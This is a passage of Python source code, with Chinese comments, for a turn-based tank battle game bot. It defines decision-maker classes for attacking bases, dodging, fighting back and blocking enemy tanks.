撤退行为发生在己方基地,不宜过度攻击墙,否则可能会削弱基地的防御性 实现方法 ------------- 让 block 类型的块的权重增加,这样就可以让 block 更多的路线的长度增加 TODO: 是否对含有相同 block 的路线上的 block 进行进一步的评估?也就是认为基地外围的 block 的权重更高? """ x2, y2 = route.end LENGTH_INCREMENT_OF_BLOCK = 1 # 遇到墙,权重加 1 LENGTH_INCREMENT_OF_INNERMOST_BLOCK = 2 # 遇到最内层的墙,权重加 2 realLength = route.length for node in route: x1, y1 = node.xy if node.weight == 2: # 权重为 2 的块一定是 block 类型 if np.abs(x1 - x2) <= 1 and np.abs(y1 - y2) <= 1: # 位于 end 的外围 realLength += LENGTH_INCREMENT_OF_INNERMOST_BLOCK else: realLength += LENGTH_INCREMENT_OF_BLOCK return realLength #{ END 'strategy/evaluate.py' }# #{ BEGIN 'decision/abstract.py' }# class DecisionMaker(object): """ 决策者的抽象基类 ---------------- 泛指一切具有决策能力的对象,可以是具象的,例如 Team, Player 也可以是抽象的,例如决策类 该类的派生类对特定的决策代码段进行封装 如果派生类是决策类,那么将实现对决策逻辑的拆分,以此来提高决策树的清晰度,提高决策逻辑的复用性 """ UNHANDLED_RESULT = None def __init__(self, *args, **kwargs): if self.__class__ is __class__: raise NotImplementedError def is_handled(self, result): """ 用于判断决策对象返回的结果是否标志着该决策适用于当前情况,用于被外部判断 规定当该决策对象不能 handle 时,返回 __class__.UNHANDLED_RESULT 那么只需要判断实际返回值是否与之相等,即可判断该情况是否被 handle """ return result != self.__class__.UNHANDLED_RESULT def _make_decision(self): """ 真正用于被派生类重载的抽象决策接口 如果该情况不适用,那么不需要写任何返回值,函数默认返回 None make_decision 函数将以此来判断该情况是否被 handle """ raise NotImplementedError def make_decision(self): """ 外部可调用的决策接口 ---------------------- 会对 _make_decision 的结果进行一些统一的处理,也可以用于在决策前后进行一些预处理和后处理操作 此处提供一个默认的情况的处理方法: ---------------------------------- - 如果真正的决策函数返回了一个 action ,则将其作为最终结果直接返回 - 如果当前情况不适用,真正的决策函数返回了 None ,则返回 UNHANDLED_RESULT """ res = self._make_decision() if res is None: return self.__class__.UNHANDLED_RESULT return res class SingleDecisionMaker(DecisionMaker): """ 单人决策者的抽象基类,用于 Tank2Player 的个人决策 """ UNHANDLED_RESULT = Action.INVALID def __init__(self, player, signal): """ 重写的构造函数,确保与 Tank2Player._make_decision 接口的参数列表一致 Input: - player Tank2Player 单人玩家实例 - signal int 团队信号 """ self._player = player self._signal = signal if self.__class__ is __class__: raise NotImplementedError class RespondTeamSignalDecisionMaker(SingleDecisionMaker): """ 用于处理团队信号的决策模型 注意: ------------ """ UNHANDLED_RESULT = ( Action.INVALID, Signal.INVALID ) HANDLED_SIGNALS = ( ) # 将会处理到的团队信号 def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) if self.__class__ is __class__: raise NotImplementedError def make_decision(self): """ 通常来说,如果团队发送了一个信号,必须及时返回一个结果 只有在 signal is None 的情况下,才返回 UNHANDLED_RESULT """ res = self._make_decision() if res is None: signal = self._signal if signal in self.__class__.HANDLED_SIGNALS: # 团队信号必须得到响应 raise Exception("team signal %d must be responded" % signal) return self.__class__.UNHANDLED_RESULT return res class TeamDecisionMaker(DecisionMaker): """ 团队决策的抽象基类,用于 Tank2Team 的双人决策 TeamDecision 与 SingleDecision 不一样,它不存在最优的决策者, 而是所有决策者都会尝试进行一次决策。决策存在高低优先级,高优先级的决策者 如果对某个 player 的行为进行了协调,那么低优先级的决策者不应该覆盖高优先级 决策者的现有决策结果(当然极其特殊的决策者例外)。 如果使用 DecisionChain 进行多个团队决策者的连续决策, 那么整个决策链上的所有决策者必定都会进行一次决策。 """ def __init__(self, team): self._team = team # Tank2Team if self.__class__ is __class__: raise NotImplementedError def is_handled(self, result): """ 为了适应 DecisionChain 的决策,这里重写 is_handled 函数 使得无论如何都可以让 DecisionChain 继续 """ return False def _make_decision(self, *args, **kwargs): """ 派生类重写的 _make_decision 要求返回值必须是 [int, int] """ raise NotImplementedError return [ Action.INVALID, Action.INVALID ] def make_decision(self): """ 重写 makd_decision 接口 确保在决策完成后 player1, player2 的决策结果与返回结果同步 这主要考虑到在决策的时候可能会忘记 create_snapshot ... """ team = self._team player1, player2 = team.players action1, action2 = self._make_decision() player1.set_current_decision(action1) player2.set_current_decision(action2) return [ action1, action2 ] #{ END 'decision/abstract.py' }# #{ BEGIN 'decision/chain.py' }# class DecisionChain(DecisionMaker): """ 决策链 ------------- 效仿责任链模式,对多个决策实例进行组合,按优先级顺序依次进行决策 如果遇到一个符合条件的决策,则将其决策结果返回,否则继续尝试低优先级的决策 """ UNHANDLED_RESULT = None def __init__(self, *decisions): self._decisions = decisions for decision in self._decisions: # 确保所有的 decision 实例均为 DecisionMaker 的派生 assert isinstance(decision, DecisionMaker) def _make_decision(self): for decision in self._decisions: res = decision.make_decision() if decision.is_handled(res): return res #{ END 'decision/chain.py' }# #{ BEGIN 'decision/single/leave_teammate.py' }# class LeaveTeammateDecision(RespondTeamSignalDecisionMaker): """ 处理两人重叠的情况 -------------------- 1. 尝试采用安全的移动行为离开队友 2. 避免和队友采用相同的移动方向 3. 尽量往不导致进攻路线增加的方向移动 """ HANDLED_SIGNALS = ( Signal.SHOULD_LEAVE_TEAMMATE, ) def _make_decision(self): player = self._player signal = self._signal map_ = player._map battler = player.battler teammate = player.teammate if signal == Signal.SHOULD_LEAVE_TEAMMATE: actions = [] for action in battler.get_all_valid_move_actions(): if not Action.is_move(player.try_make_decision(action)): # 存在风险 continue if action == teammate.get_current_decision(): # 不能与队友的移动方向相同! continue actions.append(action) if len(actions) == 0: # 没有合理的离开行为 ... return ( Action.STAY, Signal.CANHANDLED ) route1 = battler.get_shortest_attacking_route() deltaLengths = {} # action -> deltaLength for action in actions: with map_.simulate_one_action(battler, action): route2 = battler.get_shortest_attacking_route() # 必定有路? deltaLengths[action] = route2.length - route1.length # 移动后进攻路线短变短者值小 action = min( deltaLengths.items(), key=lambda kv: kv[1] )[0] player.set_status(Status.READY_TO_LEAVE_TEAMMATE) return ( action, Signal.READY_TO_LEAVE_TEAMMATE ) #{ END 'decision/single/leave_teammate.py' }# #{ BEGIN 'decision/single/attack_base.py' }# class AttackBaseDecision(SingleDecisionMaker): """ 特殊情况决策,当下一步就要拆掉敌方基地时 """ def _make_decision(self): player = self._player battler = player.battler # TODO: # 可能需要考虑一种特殊情况: 队友被杀,自己下一步打掉对方基地,但是对方下一步把我干掉 # 这种情况下,即使我方拆掉对方基地也算平局。也许可以考虑先闪避一回合,然后再继续拆家。 # if battler.is_face_to_enemy_base() and battler.canShoot: player.set_status(Status.READY_TO_ATTACK_BASE) # 特殊状态 return battler.get_next_attacking_action() # 必定是射击 ... #{ END 'decision/single/attack_base.py' }# #{ BEGIN 'decision/single/encount_enemy.py' }# class EncountEnemyDecision(SingleDecisionMaker): """ 遭遇敌人时的决策 """ def _make_decision(self): player = self._player signal = self._signal map_ = player._map tank = player.tank battler = player.battler teammate = player.teammate Tank2Player = type(player) BattleTank = type(battler) aroundEnemies = battler.get_enemies_around() if len(aroundEnemies) > 0: player.set_status(Status.ENCOUNT_ENEMY) if len(aroundEnemies) > 1: # 两个敌人,尝试逃跑 assert len(aroundEnemies) == 2 # 可能会遇到极其罕见的三人重叠 # 首先判断是否为真正的双人夹击 enemy1, enemy2 = aroundEnemies x, y = tank.xy x1, y1 = enemy1.xy x2, y2 = enemy2.xy # 先判断敌人是否重叠,如果是,那么很有可能直接击杀! if (x1, y1) == (x2, y2): if (not teammate.defeated # 队友还没有死,自己可以考虑牺牲 and battler.canShoot ): player.set_status(Status.ENCOUNT_TWO_ENEMY) player.set_status(Status.READY_TO_DOUBLE_KILL_ENEMIES) player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(enemy1) if x1 == x2 == x: if (y > y1 and y > y2) or (y < y1 and y < y2): player.set_status(Status.ENCOUNT_ONE_ENEMY) pass # 实际可视为一个人 elif y1 == y2 == y: if (x > x1 and x > x2) or (x < x1 and x < x2): player.set_status(Status.ENCOUNT_ONE_ENEMY) pass else: # 真正的被夹击 player.set_status(Status.ENCOUNT_TWO_ENEMY) oppBattlers = [ BattleTank(_enemy) for _enemy in aroundEnemies ] if all( oppBattler.canShoot for oppBattler in oppBattlers ): # 如果两者都有弹药,可能要凉了 ... player.set_status(Status.DYING) if battler.canShoot: # TODO: 这种情况下有选择吗? player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(enemy1) # 随便打一个? elif all( not oppBattler.canShoot for oppBattler in oppBattlers ): # 均不能进攻的话,优先闪避到下回合没有敌人的位置(优先考虑拆家方向) firstMoveAction = tuple() attackAction = battler.get_next_attacking_action() if Action.is_move(attackAction): # 如果是移动行为 firstMoveAction = ( attackAction, ) for action in firstMoveAction + Action.MOVE_ACTIONS: if map_.is_valid_move_action(tank, action): with map_.simulate_one_action(tank, action): if len( battler.get_enemies_around() ) < 2: # 一个可行的闪避方向 player.set_status(Status.READY_TO_DODGE) return action # 均不能闪避,应该是处在狭道内,则尝试任意攻击一个 if battler.canShoot: # TODO: 是否有选择? player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(enemy1) # 随便打一个 else: # 有一个能射击,则反击他 for oppBattler in oppBattlers: if oppBattler.canShoot: # 找到能射击的敌人 actions = battler.try_dodge(oppBattler) if len(actions) == 0: # 不能闪避 if battler.canShoot: player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(oppBattler) else: # 要凉了 ... break elif len(actions) == 1: action = player.try_make_decision(actions[0]) else: action = player.try_make_decision(actions[0], player.try_make_decision(actions[1])) if Action.is_move(action): # 统一判断 player.set_status(Status.READY_TO_DODGE) return action # 没有办法?尝试反击 if battler.canShoot: player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(oppBattler) else: # 要凉了 break # 没有办法对付 .. player.set_status(Status.DYING) # 无所谓的办法了... return player.try_make_decision(battler.get_next_attacking_action()) # TODO: # 虽然说遇到了两个一条线上的敌人,但是这不意味着后一个敌人就没有威胁 5ccee460a51e681f0e8e5b17 # 当前情况: # --------- # 1. 敌人数量为 2 但是一个处在另一个身后,或者重叠,可视为一架 # 2. 敌人数量为 1 # if len(aroundEnemies) == 1: oppTank = aroundEnemies[0] else: # len(aroundEnemies) == 2: oppTank = battler.get_nearest_enemy() oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) # # (inserted) 判断上回合敌人是否和我重叠,用于标记敌人 5ce52a48d2337e01c7a714c7 # if (player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) and not player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=2) and not Action.is_move(player.get_previous_action(back=1)) # 且不是因为我方主动打破重叠导致 ): # 上回合刚刚进入重叠,这回合就被打破 with map_.rollback_to_previous(): if oppTank is battler.get_overlapping_enemy(): oppPlayer.add_labels(Label.IMMEDIATELY_BREAK_OVERLAP_BY_MOVE) # # 在非 WITHDRAW 的情况下,评估当前侵略性 # if not player.has_status(Status.WITHDRAW): _allowWithdraw = ( WithdrawalDecision.ALLOW_WITHDRAWAL and not player.has_label(Label.DONT_WITHDRAW) ) status = evaluate_aggressive(battler, oppBattler, allow_withdraw=_allowWithdraw) player.set_status(status) else: status = Status.WITHDRAW # 侵略模式/僵持模式 #---------- # 1. 优先拆家 # 2. 只在必要的时刻还击 # 3. 闪避距离不宜远离拆家路线 # if status == Status.AGGRESSIVE or status == Status.STALEMENT: if not oppBattler.canShoot: # 如果能直接打死,那当然是不能放弃的!! if len( oppBattler.try_dodge(battler) ) == 0: # 必死 if battler.canShoot: player.set_status(Status.READY_TO_KILL_ENEMY) return battler.shoot_to(oppBattler) attackAction = battler.get_next_attacking_action() # 其他情况,优先进攻,不与其纠缠 realAction = player.try_make_decision(attackAction) # 默认的进攻路线 if Action.is_stay(realAction): # 存在风险 if Action.is_move(attackAction): # # 原本移动或射击,因为安全风险而变成停留,这种情况可以尝试射击,充分利用回合数 # # TODO: # 实际上,很多时候最佳路线选择从中线进攻,但从两侧进攻也是等距离的, # 在这种情况下,由于采用从中线的进攻路线,基地两侧的块并不落在线路上,因此会被 # 忽略,本回合会被浪费。但是进攻基地两侧的块往往可以减短路线。因此此处值得进行 # 特殊判断 # fields = battler.get_destroyed_fields_if_shoot(attackAction) route = battler.get_shortest_attacking_route() for field in fields: if route.has_block(field): # 为 block 对象,该回合可以射击 action = player.try_make_decision(battler.shoot_to(field)) if Action.is_shoot(action): player.set_status(Status.PREVENT_BEING_KILLED) player.set_status(Status.KEEP_ON_MARCHING) return action # TODO: 此时开始判断是否为基地外墙,如果是,则射击 for field in fields: if battler.check_is_outer_wall_of_enemy_base(field): action = player.try_make_decision(battler.shoot_to(field)) if Action.is_shoot(action): player.set_status(Status.PREVENT_BEING_KILLED) player.set_status(Status.KEEP_ON_MARCHING) return action # 刚刚对射为两回合,该回合双方都没有炮弹,尝试打破僵局 #--------------------------------------------------- # 当前为侵略性的,并且在对方地盘,尝试回退一步,与对方重叠。 # 后退操作必须要有限制 5cd10315a51e681f0e900fa8 # # 如果一直回头,尝试在这一步选择非回头的其他行为 5ced8eee641dd10fdcc7907f # if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=3) and Action.is_stay(player.get_previous_action(back=2)) # 还需要检查两者上上回合是否为等待 and Action.is_stay(oppPlayer.get_previous_action(back=2)) # 避免将边移动边对射的情况考虑进来 and battler.is_in_enemy_site() # 添加必须在对方地盘的限制,避免在我方地盘放人 and player.has_status(Status.AGGRESSIVE) # 只有侵略性的状态可以打破僵局 ): # 判断是否为反复回头 if player.has_status_recently(Status.READY_TO_BACK_AWAY, turns=6): # 最近几回合内是否曾经回头过 player.add_labels(Label.ALWAYS_BACK_AWAY) if (player.has_label(Label.ALWAYS_BACK_AWAY) and not battler.is_in_our_site(include_midline=True) # 严格不在我方基地 ): # 考虑用闪避的方式代替后退 for action in battler.try_dodge(oppBattler): realAction = player.try_make_decision(action) if Action.is_move(realAction): player.set_status(Status.TRY_TO_BREAK_ALWAYS_BACK_AWAY) player.remove_labels(Label.ALWAYS_BACK_AWAY) # 删掉这个状态 return realAction # 否则继续回头 backMoveAction = battler.back_away_from(oppBattler) action = player.try_make_decision(backMoveAction) if Action.is_move(action): player.set_status(Status.READY_TO_BACK_AWAY) return action if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=1) # 上回合正在和对方对射 and not battler.canShoot # 但是我方本回合不能射击 and not oppBattler.canShoot # 并且对方本回合不能射击 ): player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射状态,用于后方打破僵持 # 其余情况照常 player.set_status(Status.PREVENT_BEING_KILLED) return realAction # 否则不予理会,直接移动或者反击 action = player.try_make_decision(battler.get_next_attacking_action()) if not Action.is_stay(action): # 补丁 #---------------------------- # 针对两者距离为 2 的情况,不能一概而论! # if status == Status.STALEMENT: # 僵持模式考虑堵路 _route = battler.get_route_to_enemy_by_move(oppBattler) if _route.is_not_found(): _route = battler.get_route_to_enemy_by_move(oppBattler, block_teammate=False) assert not _route.is_not_found(), "route not found ?" # 必定能找到路! assert _route.length > 0, "unexpected overlapping enemy" if _route.length == 2: if not player.is_suitable_to_overlap_with_enemy(oppBattler): # 更适合堵路 player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # 其他情况均可以正常移动 #player.set_status(Status.KEEP_ON_MARCHING) #return action return # 直接抛出让后面的 decision 处理,当做没有这个敌人 # 不能移动,只好反击 action = player.try_make_decision(battler.shoot_to(oppBattler)) if Action.is_shoot(action): player.set_status(Status.READY_TO_FIGHT_BACK) return action else: # 对方有炮弹,需要分情况 5ccb3ce1a51e681f0e8b4de1 #----------------------------- # 1. 如果是侵略性的,则优先闪避,并且要尽量往和进攻路线方向一致的方向闪避,否则反击 # 2. 如果是僵持的,那么优先堵路,类似于 Defensive # # TODO: # 可能需要团队信号协调 5ccc30f7a51e681f0e8c1668 # if status == Status.STALEMENT: # # 首先把堵路的思路先做了,如果不能射击,那么同 aggressive # # TODO: # 有的时候这并不是堵路,而是在拖时间! 5ccf84eca51e681f0e8ede59 # 上一回合保持重叠,但是却被敌人先过了,这种时候不宜僵持,应该直接走人 # 这种情况下直接转为侵略模式! # if (player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) and (player.has_status_in_previous_turns(Status.READY_TO_BLOCK_ROAD, turns=1) or player.has_status_in_previous_turns(Status.KEEP_ON_OVERLAPPING, turns=1)) ): pass # 直接过到侵略模式 else: # 否则算作正常的防守 # # TODO: # 射击不一定正确,因为敌人可能上回合刚把我过掉,此时应该考虑主动闪走! # 5ce4e66cd2337e01c7a6abd7 # if battler.canShoot: # # (inserted) 先看上回合是不是刚被对方过掉 # _justBreakOverlap = False with map_.rollback_to_previous(): if (battler.has_overlapping_enemy() and oppTank is battler.get_overlapping_enemy() ): # 刚刚被对手打破重叠 _justBreakOverlap = True _shouldShoot = False if _justBreakOverlap: # 刚刚被对手主动打破重叠 for _route in battler.get_all_shortest_attacking_routes(): if oppTank.xy in _route: # 对方现在位于我的攻击路线上,说明对方上回合是 _shouldShoot = True # 回头堵路,那么继续保持射击 break if _shouldShoot: # 正常防御 player.set_status(Status.READY_TO_BLOCK_ROAD, Status.READY_TO_FIGHT_BACK) if battler.on_the_same_line_with(oppBattler, ignore_brick=False): player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射 return battler.shoot_to(oppBattler) else: pass # 否则视为进攻逻辑 # 闪避,尝试找最佳方案 #------------------------- defenseAction = Action.STAY if battler.canShoot: defenseAction = battler.shoot_to(oppBattler) dodgeActions = battler.try_dodge(oppTank) if battler.is_in_enemy_site(): # 限制条件,只有在对方基地才开始闪现! # # 最佳方向是闪避向着进攻方向移动 # attackAction = battler.get_next_attacking_action() for action in dodgeActions: # 与进攻方向相同的方向是最好的 if Action.is_same_direction(action, attackAction): realAction = player.try_make_decision(action) # 风险评估 if Action.is_move(realAction): player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE) return realAction # 闪避加行军 # 没有最佳的闪避方案,仍然尝试闪避 #----------------------------- # 但是不能向着增加攻击线路长短的方向闪避! # route1 = battler.get_shortest_attacking_route() for action in dodgeActions: realAction = player.try_make_decision(action) if Action.is_move(realAction): with map_.simulate_one_action(battler, action): route2 = battler.get_shortest_attacking_route() if route2.length > route1.length: # 不能超过当前路线长度,否则就是浪费一回合 continue else: player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE) return realAction # # 此时还可以考虑借力 # 假设下回合两方对射,如果我方尝试闪避,对方会恰好打掉我方进攻路线上的块,那么就闪避 # if (len(dodgeActions) > 0 # 存在可用的闪避行为 and battler.is_in_enemy_site() # 限制为只有在对方基地才适用这个逻辑 ): _shouldDodge = False action = dodgeActions[0] enemyShootAction = oppBattler.shoot_to(battler) with outer_label() as OUTER_BREAK: with map_.simulate_one_action(battler, action): # 假设闪走 fields = oppBattler.get_destroyed_fields_if_shoot(enemyShootAction) for field in fields: if isinstance(field, BrickField): # 对手会打掉墙 for _route in battler.get_all_shortest_attacking_routes(): if field.xy in _route: # 这个块在某一个最短的攻击路线上 _shouldDodge = True raise OUTER_BREAK if _shouldDodge: for action in dodgeActions: realAction = player.try_make_decision(action) if Action.is_move(realAction): player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE) return realAction # # 没有不能不导致路线变长的办法,如果有炮弹,那么优先射击! # 5ccef443a51e681f0e8e64d8 #----------------------------------- route1 = battler.get_shortest_attacking_route() if Action.is_shoot(defenseAction): player.set_status(Status.READY_TO_FIGHT_BACK) if battler.on_the_same_line_with(oppBattler, ignore_brick=False): # (inserted) 刚刚对射为两回合,该回合尝试闪避敌人,打破僵局 #-------------------------------------------- # 尝试往远处闪避,创造机会 # # 此外,由于敌人这回合必定射击,那么他的炮弹可能会打掉我身后的墙 # 这样的可能会创造一些新的机会。有的时候导致该回合必须要与敌人对射的原因,可能是因为 # 没有办法开辟攻击路线,而不是敌人堵路。由于闪避的方向是不允许的,也就是另一个更近的 # 闪避反向上必定是一个无法摧毁也不能移动到的块,否则会被与先摧毁。 # 此时如果可以往背离敌人的方向移动,那么应该不会陷入对射僵局。但事实上是进入了 # 这就说明别离敌人的方向是无法移动到的。如果它恰好是一块土墙,那么就可以靠这回合和敌人接力 # 来摧毁掉,也许还有往下移动的可能。 5ce429fad2337e01c7a5cd61 # if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=4) and Action.is_stay(player.get_previous_action(back=1)) # 检查对应的两个冷却回合是停止 and Action.is_stay(player.get_previous_action(back=3)) # 避免将移动对射的情况被考虑进来 and Action.is_stay(oppPlayer.get_previous_action(back=1)) and Action.is_stay(oppPlayer.get_previous_action(back=3)) and battler.is_in_enemy_site() # 添加必须在对方地盘的限制,避免在我方地盘放人 and player.has_status(Status.AGGRESSIVE) # 只有侵略性的状态可以打破僵局 ): for action in battler.try_dodge(oppBattler): if Action.is_move(action): realAction = player.try_make_decision(action) if Action.is_move(realAction): player.set_status(Status.READY_TO_DODGE) # 这里还是再判断一下距离 route1 = battler.get_shortest_attacking_route() with map_.simulate_one_action(battler, action): route2 = battler.get_shortest_attacking_route() if route2.length > route1.length: player.set_status(Status.WILL_DODGE_TO_LONG_WAY) return realAction # 默认是优先射击 player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) return defenseAction # 如果不能射击,那么终究还是要闪避的 # 或者是无法后方移动,为了打破僵局,尝试闪避 #---------------------------------- for action in dodgeActions: realAction = player.try_make_decision(action) if Action.is_move(realAction): player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE) # # 因为这种情况很有可能会出现死循环 5cd009e0a51e681f0e8f3ffb # 为了后续能够打破这种情况,这里额外添加一个状态进行标记 # player.set_status(Status.WILL_DODGE_TO_LONG_WAY) return realAction if Action.is_stay(defenseAction): # # 其实还有一种情况,那就是危险的敌人在自己身上! 5ceaaacdd2337e01c7adf6a4 # riskyEnemyBattler = player.get_risky_enemy() if (riskyEnemyBattler is not None and riskyEnemyBattler is not oppBattler and riskyEnemyBattler.xy == battler.xy ): # 这种情况下实际是没有威胁的 ... for action in dodgeActions: player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE) # TODO: # 还需要判断是否向远路闪避 ... # 这里的细节还需要优化,或者这个和自己重叠的条件在前面就要穿插进去 return action player.set_status(Status.DYING) # 否则就凉了 ... return defenseAction return Action.STAY # 防御模式 #---------- # 1. 如果对方下回合必死,那么射击 # 2. 优先堵路,距离远则尝试逼近 # 3. 必要的时候对抗 # 4. 距离远仍然优先 # # elif status == DEFENSIVE_STATUS: # attackAction = self.try_make_decision(battler.get_next_attacking_action()) # 默认的侵略行为 elif status == Status.DEFENSIVE: if not oppBattler.canShoot: if len( oppBattler.try_dodge(battler) ) == 0: if battler.canShoot: # 必死情况 player.set_status(Status.READY_TO_KILL_ENEMY) return battler.shoot_to(oppBattler) # # 不能马上打死,敌人又无法攻击 #------------------------------- # 优先堵路,根据双方距离判断 # _route = battler.get_route_to_enemy_by_move(oppBattler) if _route.is_not_found(): _route = battler.get_route_to_enemy_by_move(oppBattler, block_teammate=False) assert not _route.is_not_found(), "route not found ?" # 必定能找到路! assert _route.length > 0, "unexpected overlapping enemy" if _route.length == 1: # 双方相邻,选择等待 # 此处首先延续一下对射状态 if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=1) # 上回合正在和对方对射 and not battler.canShoot # 但是我方本回合不能射击 and not oppBattler.canShoot # 并且对方本回合不能射击 ): player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射状态,用于后方打破僵持 player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY elif _route.length > 2: # 和对方相隔两个格子以上 if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全逼近 action = battler.move_to(oppBattler) player.set_status(Status.READY_TO_BLOCK_ROAD) # 可以认为在堵路 ... return action else: player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # 否则只好等额爱 else: # _route.length == 2: # 相距一个格子,可以前进也可以等待,均有风险 #---------------------------------------- # 1. 如果对方当前回合无法闪避,下一回合最多只能接近我 # - 如果对方下回合可以闪避,那么我现在等待是意义不大的,不如直接冲上去和他重叠 # - 如果对方下回合仍然不可以闪避,那么我就选择等待,反正它也走不了 # 2. 如果对方当前回合可以闪避,那么默认冲上去和他重叠 # - 如果我方可以射击,那么对方应该会判定为闪避,向两旁走,那么我方就是在和他逼近 # - 如果我方不能射击,对方可能会选择继续进攻,如果对方上前和我重叠,就可以拖延时间 # # TODO: # 好吧,这里的想法似乎都不是很好 ... # 能不防御就不防御,真理 ... # """if len( oppBattler.try_dodge(battler) ) == 0: # 对手当前回合不可闪避,当然我方现在也不能射击。现在假设他下一步移向我 action = oppBattler.move_to(battler) # 对方移向我 if map_.is_valid_move_action(oppBattler, action): map_.simulate_one_action(oppBattler, action) # 提交模拟 if len( oppBattler.try_dodge(battler) ) == 0: # 下回合仍然不可以闪避,说明可以堵路 map_.revert() player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY map_.revert() # 否则直接冲上去 if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全移动 moveAction = battler.move_to(oppBattler) player.set_status(Status.READY_TO_BLOCK_ROAD) # 可以认为在堵路 return moveAction else: # 冲上去不安全,那就只能等到了 player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY else: # 对手当前回合可以闪避,那么尝试冲上去和他重叠 # TODO: # 可能弄巧成拙 5cca97a4a51e681f0e8ad227 # # 这个问题需要再根据情况具体判断! # ''' if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全重叠 moveAction = battler.move_to(oppBattler) player.set_status(Status.READY_TO_BLOCK_ROAD) return moveAction else: # 有风险,考虑等待 player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY ''' # # TODO: # 是否应该根据战场情况进行判断,比如停下来堵路对方一定无法走通? # # 假设自己为钢墙然后搜索对方路径? # player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY""" player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # 似乎没有比这个这个更好的策略 ... # 对方可以射击 else: if battler.canShoot: # 优先反击 player.set_status(Status.READY_TO_FIGHT_BACK) if battler.on_the_same_line_with(oppBattler, ignore_brick=False): player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 触发对射状态 return battler.shoot_to(oppBattler) # 不能反击,只好闪避 actions = battler.try_dodge(oppBattler) if len(actions) == 0: player.set_status(Status.DYING) # 凉了 ... action = Action.STAY elif len(actions) == 1: action = player.try_make_decision(actions[0]) else: # len(actions) == 2: action = player.try_make_decision(actions[0], player.try_make_decision(actions[1])) if Action.is_move(action): # 统一判断 player.set_status(Status.READY_TO_DODGE) return action # 否则就凉了 ... player.set_status(Status.DYING) return Action.STAY # # 回撤模式 #------------ # 1. 优先回撤 # 2. 如果处在守卫状况,根据所处位置,选择反击或堵路 # elif status == Status.WITHDRAW: base = map_.bases[battler.side] if not battler.is_closest_to(base): with player.create_snapshot(): decision = WithdrawalDecision(player, signal) action = decision.make_decision() if decision.is_handled(action): with map_.simulate_one_action(battler, action): if oppTank not in battler.get_enemies_around(): # 安全行为 return # 留给 withdraw 处理 else: # 现在我方坦克已经处在基地附近 with player.create_snapshot(): decision = BaseDefenseDecision(player, signal) action = decision.make_decision() if decision.is_handled(action): # 符合 base defense 的条件 with map_.simulate_one_action(battler, action): if oppTank not in battler.get_enemies_around(): # 安全行为 return # 留给 base defense # # 否则就是不安全行为,应该予以反击 # if battler.canShoot: player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(oppBattler) elif oppBattler.canShoot: # 否则应该闪避 for action in battler.try_dodge(oppBattler): player.set_status(Status.READY_TO_DODGE) return action if oppBattler.canShoot: player.set_status(Status.DYING) # 不然就凉了 ... # 最后就等待 return Action.STAY #{ END 'decision/single/encount_enemy.py' }# #{ BEGIN 'decision/single/overlapping.py' }# class OverlappingDecision(SingleDecisionMaker): """ 与敌人重合时的决策 ------------------------ 侵略模式 -------- 1. 直奔对方基地,有机会就甩掉敌人 防御模式 -------- 1. 尝试回退堵路 2. 对于有标记的敌人,考虑采用其他的策略,例如尝试击杀敌军 多回合僵持后,会有主动打破重叠的决策 """ def _make_decision(self): player = self._player signal = self._signal map_ = player._map tank = player.tank battler = player.battler Tank2Player = type(player) BattleTank = type(battler) if battler.has_overlapping_enemy(): player.set_status(Status.ENCOUNT_ENEMY) player.set_status(Status.OVERLAP_WITH_ENEMY) oppTank = battler.get_overlapping_enemy() oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) if not player.has_status(Status.WITHDRAW): _allowWithdraw = ( WithdrawalDecision.ALLOW_WITHDRAWAL and not player.has_label(Label.DONT_WITHDRAW) ) status = evaluate_aggressive(battler, oppBattler, allow_withdraw=_allowWithdraw) player.set_status(status) else: status = Status.DEFENSIVE # 看作是防御 # # 先检查对方上回合是否在跟随我移动,以及时切换决策模式 ... # 5cd3f56d86d50d05a0083621 / 5ccec5a6a51e681f0e8e46c2 / 5ce26520d2337e01c7a3ca2b #------------------------------- if (player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) and Action.is_move(player.get_previous_action(back=1)) ): oppPlayer.add_labels(Label.BREAK_OVERLAP_SIMULTANEOUSLY) if (oppPlayer.has_label(Label.BREAK_OVERLAP_SIMULTANEOUSLY) and 